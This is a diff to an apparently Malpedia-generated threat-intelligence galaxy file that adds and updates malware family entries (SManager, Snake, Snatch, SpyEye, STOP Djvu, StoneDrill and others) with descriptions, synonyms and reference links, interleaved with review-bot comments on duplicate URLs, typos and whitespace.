+ "https://www.secureworks.com/research/threat-profiles/bronze-express"
 ],
 "synonyms": [
 "speccom"
@@ -15675,26 +28509,100 @@ "uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae", "value": "smac" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager", + "https://0xthreatintel.medium.com/reversing-apt-tool-smanager-unpacked-d413a04961c4", + "https://blog.vincss.net/2020/12/phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html", + "https://blog.vincss.net/2021/02/re020-elephantrat-kunming-version-our-latest-discovered-RAT-of-Panda.html", + "https://0xthreatintel.medium.com/how-to-unpack-smanager-apt-tool-cb5909819214", + "https://blog.vincss.net/2020/12/re018-2-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html?m=1", + "https://blog.vincss.net/2020/12/re017-2-phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html", + "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager", + "https://blog.vincss.net/2020/12/re018-1-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html", + "https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/" + ], + "synonyms": [ + "PhantomNet" + ], + "type": [] + }, + "uuid": "1a6a6e4c-3e0e-422b-9840-9c6286dc7b17", + "value": "SManager" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smarteyes", + "https://www.virustotal.com/gui/file/4eb840617883bf6ed7366242ffee811ad5ea3d5bfd2a589a96d6ee9530690d28/details" + ], + "synonyms": [], + "type": [] + }, + "uuid": "67723f6e-822b-475a-938b-c9114b9aefea", + "value": "SmartEyes" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smaug", + 
"https://www.anomali.com/blog/anomali-threat-research-releases-first-public-analysis-of-smaug-ransomware-as-a-service", + "https://labs.sentinelone.com/multi-platform-smaug-raas-aims-to-see-off-competitors/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b81cbf03-8909-4833-badf-4df32c9bf6cb", + "value": "SMAUG Ransomware" + }, { "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader", - "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", - "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", - "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", - "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", - "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", + "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo", - "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/", - 
"https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", + "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/", + "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", + "https://research.checkpoint.com/2019-resurgence-of-smokeloader/", + "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe", + "https://n1ght-w0lf.github.io/malware%20analysis/smokeloader/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://danusminimus.github.io/Analyzing-Modern-Malware-Techniques-Part-4/", + "https://www.sentinelone.com/blog/going-deep-a-guide-to-reversing-smoke-loader-malware/", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait", + "https://hatching.io/blog/tt-2020-08-27/", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://www.telekom.com/en/blog/group/article/a-new-way-to-encrypt-cc-server-urls-614886", + "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", + "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", + "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", + "https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/", + 
"https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", + "http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html", + "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries", + "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html", "https://www.cert.pl/en/news/single/dissecting-smoke-loader/", - "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/" + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/", + "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", + "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", + "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/", + "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/" ], "synonyms": [ - "Dofoil" + "Dofoil", + "Sharik", + "Smoke", + "Smoke Loader" ], "type": [] }, 
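Review bot: In the SManager entry, `https://blog.vincss.net/2020/12/phan-tich-ky-thuat-...-Panda.html` and `https://blog.vincss.net/2020/12/re017-2-phan-tich-ky-thuat-...-Panda.html` appear to be the same VinCSS post under two slugs, and the `re018-2-...html?m=1` entry carries a mobile-view query parameter that should be stripped before the URL is stored as a reference. The SmartEyes entry in the same hunk has a VirusTotal file page as its only reference, which requires an account to view and contains no analysis, so the empty description leaves analysts with nothing actionable. The SmokeLoader ref list in this hunk is long and unordered, which is what makes duplicates like these hard to spot; sorting refs at generation time would help. This hunk starts at the smac entry on an earlier line and ends here.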
@@ -15731,12 +28639,80 @@ "uuid": "1fe0b2fe-5f9b-4359-b362-be611537442a", "value": "Smrss32 Ransomware" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sn0wslogger", + "https://twitter.com/struppigel/status/1354806038805897216" + ], + "synonyms": [], + "type": [] + }, + "uuid": "17c6c227-5c9b-40eb-886b-19e2b137c5e8", + "value": "Sn0wsLogger" + }, + { + "description": "Snake Ransomware is a Golang ransomware reportedly containing obfuscation not typically seen in Golang ransomware. This malware will remove shadow copies and kill processes related to SCADA/ICS devices, virtual machines, remote management tools, network management software, and others. After this, encryption of files on the device commences, while skipping Windows system folders and various system files. A random 5 character string is appended to encrypted files. According to Bleeping Computer, this ransomware takes an especially long time to encrypt files on a targeted machine. 
This ransomware is reported to target an entire network, rather than individual workstations.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snake", + "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems", + "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", + "https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/", + "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf", + "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/", + "https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/", + "https://krebsonsecurity.com/2020/05/europes-largest-private-hospital-operator-fresenius-hit-by-ransomware", + "https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/", + "https://github.com/albertzsigovits/malware-notes/blob/master/Snake.md", + "https://www.bleepingcomputer.com/news/security/honda-investigates-possible-ransomware-attack-networks-impacted/", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://twitter.com/bad_packets/status/1270957214300135426", + "https://insights.sei.cmu.edu/cert/2020/03/snake-ransomware-analysis-updates.html", + "https://www.bleepingcomputer.com/news/security/snake-ransomware-is-the-next-threat-targeting-business-networks/", + 
"https://twitter.com/milkr3am/status/1270019326976786432", + "https://medium.com/@nishanmaharjan17/malware-analysis-snake-ransomware-a0e66f487017", + "https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" + ], + "synonyms": [ + "EKANS", + "SNAKEHOSE" + ], + "type": [] + }, + "uuid": "547deef9-67c3-483e-933d-171ee8b6b918", + "value": "Snake Ransomware" + }, + { + "description": "Snatch is a ransomware which infects victims by rebooting the PC into Safe Mode. Most of the existing security protections do not run in Safe Mode so that it the malware can act without expected countermeasures and it can encrypt as many files as it finds. It uses common packers such as UPX to hide its payload.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch", + "https://www.bleepingcomputer.com/news/security/snatch-ransomware-reboots-to-windows-safe-mode-to-bypass-av-tools/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://github.com/albertzsigovits/malware-notes/blob/master/Snatch.md", + "https://twitter.com/VK_Intel/status/1191414501297528832" + ], + "synonyms": [], + "type": [] + }, + "uuid": "98139439-6863-439c-b4d0-c6893f1afb23", + "value": "Snatch" + }, { "description": "A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader", "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/", + "https://www.youtube.com/watch?v=k3sM88o_maM", "https://twitter.com/VK_Intel/status/898549340121288704", "https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/", "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/" 
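Review bot: The Snatch description contains a stray word, "so that it the malware can act without expected countermeasures"; it should read `so that the malware can act without expected countermeasures`. As descriptions are pulled from the Malpedia API, the correction has to be made upstream or the next regeneration will reintroduce it. This hunk starts at the Smrss32 entry on an earlier line and ends here.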
@@ -15767,7 +28743,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula", - "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf" + "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf", + "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html" ], "synonyms": [ "Ursnif" @@ -15815,6 +28792,36 @@ "uuid": "81e4fc8f-7b05-42bf-8ff9-568362d4f964", "value": "Sobaken" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobig", + "http://edition.cnn.com/2003/TECH/internet/08/21/sobig.virus/index.html" + ], + "synonyms": [ + "Palyh" + ], + "type": [] + }, + "uuid": "4e9f85e7-0575-40e5-8799-288ec28237ca", + "value": "Sobig" + }, + { + "description": "Socelars is an infostealer with main focus on:\r\n* Facebook Stealer (ads/manager)\r\n* Cookie Stealer | AdsCreditCard {Amazon}", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars", + "https://twitter.com/VK_Intel/status/1201584107928653824", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.bleepingcomputer.com/news/security/facebook-ads-manager-targeted-by-new-info-stealing-trojan/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4366ea63-b784-428c-bb00-89ee99eaf8c3", + "value": "Socelars" + }, { "description": "", "meta": { 
@@ -15832,9 +28839,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot", - "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf" + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" ], "synonyms": [ "BIRDDOG", @@ -15845,13 +28853,31 @@ "uuid": "da34bf80-6dc6-4b07-8094-8bed2c1176ec", "value": "SocksBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster", + "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf" + ], + "synonyms": [ + "DelfsCake", + "HEAVYPOT", + "dfls" + ], + "type": [] + }, + "uuid": "016ea180-ec16-48ce-88ea-c78d8db369d5", + "value": "SodaMaster" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot", "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/", - "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/" + "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/", + "https://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/" ], "synonyms": [ "Napolar" 
@@ -15861,13 +28887,53 @@ "uuid": "d61a1656-9413-46de-bd19-c7fe5eda3371", "value": "Solarbot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarmarker", + "https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4e08d816-9fe3-42ae-b7e4-f7182445f304", + "value": "solarmarker" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sombrat", + "https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2b2cffc5-bf6e-4636-a906-829c32115655", + "value": "SombRAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorano", + "https://github.com/3xp0rt/SoranoStealer", + "https://3xp0rt.xyz/lpmkikVic", + "https://github.com/Alexuiop1337/SoranoStealer" + ], + "synonyms": [], + "type": [] + }, + "uuid": "897985dc-6b3e-4d92-bbe4-c4902194cdcc", + "value": "Sorano" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya", - "https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper", - "https://www.arbornetworks.com/blog/asert/the-best-of-both-worlds-soraya/" + "https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper" ], "synonyms": [], "type": [] 
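Review bot: The Sorano entry's reference `https://3xp0rt.xyz/lpmkikVic` is an opaque personal-site path with no title or date, and the two GitHub references appear to be the stealer's own source repositories rather than analysis write-ups, so with an empty description an analyst gets no usable context from this element. A short description taken from the upstream Malpedia page, or a link to an actual write-up, would make the entry worth tagging against. The adjacent solarmarker and SombRAT additions raise no issue.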
@@ -15875,11 +28941,27 @@ "uuid": "26aa3c43-5049-4a2e-bec1-9709b31a1a26", "value": "soraya" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorefang", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0068e2fe-0d13-4073-be73-90118b1d285a", + "value": "SoreFang" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east", "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" ], "synonyms": [], @@ -15893,10 +28975,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf", + "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", + "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A", + "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/", "https://attack.mitre.org/wiki/Software/S0157", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", - "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/", - "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx" + "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx", + "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/" ], "synonyms": [ "denis" 
@@ -15919,6 +29006,61 @@ "uuid": "813e2761-6d68-493f-846b-2fc86d2e8079", "value": "SPACESHIP" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spark", + "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign", + "https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-one", + "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", + "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3c676c22-8041-4cf6-8291-1bb9372e2d45", + "value": "Spark" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sparkle", + "https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "339c60f6-8758-4d32-aa33-b0d722e924bb", + "value": "Sparkle" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sparksrv", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/luckycat-redux-campaign-attacks-multiple-targets-in-india-and-japan" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1937c3e0-569d-4eb4-b769-ae5d9cc27755", + "value": "Sparksrv" + }, + { + "description": "Spartacus is ransomware written in .NET and emerged in the first half of 2018. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spartacus", + "https://bartblaze.blogspot.com/2018/04/this-is-spartacus-new-ransomware-on.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e4dce19f-bb8e-4ea1-b771-58b162946f29", + "value": "Spartacus" + }, { "description": "", "meta": { 
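Review bot: The Spartacus description ends with a trailing space inside the string (`"...emerged in the first half of 2018. "`), which is carried into every MISP instance that imports the cluster; trim it to `"...emerged in the first half of 2018."`. Since the file is API-generated, the generator should strip leading and trailing whitespace on description fields so this class of issue does not recur.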
@@ -15932,6 +29074,19 @@
 "uuid": "bd29030e-d440-4842-bc2a-c173ed938da4",
 "value": "Spedear"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spicyhotpot",
+ "https://www.crowdstrike.com/blog/spicy-hot-pot-rootkit-explained/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "dfbe088e-dd6d-4bad-8e2b-7a4162034da4",
+ "value": "Spicy Hot Pot"
+ },
 {
 "description": "",
 "meta": {
@@ -15963,16 +29118,25 @@ "value": "SpyBot" }, { - "description": "", + "description": "SpyEye is a malware targeting both Microsoft Windows browsers and Apple iOS Safari. Originated in Russia, it was available in dark forums for $500+ claiming to be the \"The Next Zeus Malware\". It performed many functionalities typical from bankers trojan such as keyloggers, auto-fill credit card modules, email backups, config files (encrypted), http access, Pop3 grabbers and FTP grabbers. SpyEye allowed hackers to steal money from online bank accounts and initiate transactions even while valid users are logged into their bank account.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.spynet_rat" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye", + "https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot", + "https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393", + "https://krebsonsecurity.com/2010/09/spyeye-botnets-bogus-billing-feature/", + "https://www.computerworld.com/article/2509482/spyeye-trojan-defeating-online-banking-defenses.html", + "https://www.pcworld.com/article/247252/spyeye_malware_borrows_zeus_trick_to_mask_fraud.html", + "https://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/", + "http://malwareint.blogspot.com/2010/02/spyeye-bot-part-two-conversations-with.html", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FSpyeye", + "https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/" ], "synonyms": [], "type": [] }, - "uuid": "1628467f-cad5-453c-a5da-a4f543747d58", - "value": "win.spynet_rat" + "uuid": "814fa0b7-0468-4ed0-b910-2b3caec96d44", + "value": "SpyEye" }, { "description": "", 
@@ -15987,6 +29151,21 @@
 "uuid": "858a2cdb-9c89-436a-b8d4-60c725c7ac63",
 "value": "SquirtDanger"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sshnet",
+ "https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices",
+ "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf",
+ "https://www.crowdstrike.com/blog/who-is-pioneer-kitten/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7e0667e8-67fd-4b5f-a3e4-3ced4dcaac1e",
+ "value": "SSHNET"
+ },
 {
 "description": "",
 "meta": {
@@ -16016,6 +29195,21 @@
 "uuid": "faa2196f-df4c-454c-995e-ded7864d5fa8",
 "value": "Stabuniq"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stalin_locker",
+ "https://www.bleepingcomputer.com/news/security/stalinlocker-deletes-your-files-unless-you-enter-the-right-code/"
+ ],
+ "synonyms": [
+ "StalinScreamer"
+ ],
+ "type": []
+ },
+ "uuid": "8c38460b-fcfd-434e-b258-875854c6aff6",
+ "value": "StalinLocker"
+ },
 {
 "description": "",
 "meta": {
@@ -16123,11 +29317,34 @@
 },
 {
 "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stonedrill",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0c5bc5c8-5136-413a-bc5a-e13333271f49",
+ "value": "StoneDrill"
+ },
+ {
+ "description": "STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. 
In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.stop",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/",
+ "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
+ "https://www.gdata.de/blog/1970/01/-35391-finger-weg-von-illegalen-software-downloads",
+ "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/",
+ "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
 "https://securelist.com/keypass-ransomware/87412/",
- "https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/"
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf"
 ],
 "synonyms": [
 "Djvu",
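Review bot: The new STOP description has two wording defects: `STOP Djvu Ransomware it is a ransomware which…` is ungrammatical, and `It is not used to encrypt the entire file but only the first 5 MB.` negates what the rest of the sentence means (presumably: it encrypts only the first 5 MB of each file). The same kind of upstream text defect appears in this diff in the SUNBURST description (`trojanzied`) and in the SYSCON description (`targeted champing`, plus a trailing space before the closing quote). Because the file is regenerated from the Malpedia API (see the commit's Ref line), hand-editing these strings in the JSON would be lost on the next pull; the fix belongs in the Malpedia entries, after which a re-export picks it up.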
@@ -16171,10 +29388,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity",
+ "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://0xthreatintel.medium.com/uncovering-apt-c-41-strongpity-backdoor-e7f9a7a076f4",
 "https://twitter.com/physicaldrive0/status/786293008278970368",
 "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/",
- "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/",
- "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/"
+ "https://cybleinc.com/2020/12/31/strongpity-apt-extends-global-reach-with-new-infrastructure/",
+ "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf",
+ "https://mp.weixin.qq.com/s/5No0TR4ECVPp_Xv4joXEBg",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/"
 ],
 "synonyms": [],
 "type": []
@@ -16187,7 +29411,19 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet",
+ "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
+ "https://www.spiegel.de/netzwelt/web/die-erste-cyberwaffe-und-ihre-folgen-a-a0ed08c9-5080-4ac2-8518-ed69347dc147",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf",
+ "https://www.codeproject.com/articles/246545/stuxnet-malware-analysis-paper",
+ "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
